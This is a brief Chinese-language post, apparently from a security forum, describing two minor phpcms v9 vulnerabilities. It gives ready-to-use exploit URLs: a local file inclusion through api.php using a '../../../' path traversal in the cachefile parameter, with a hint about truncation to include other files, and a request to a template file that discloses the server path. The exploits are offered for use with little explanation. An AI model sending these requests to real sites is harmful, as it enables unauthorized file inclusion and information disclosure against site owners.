phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。 Exp: http://www.php0day.com/api.php?op=get_menu&act=ajax_getlist&callback=alert&path=b4dboy&cachefile=../../../fuck #暴路径 Exp: http://www.php0day.com/phpcms/modules/attachment/templates/album_dir.tpl.php?author=b4dboy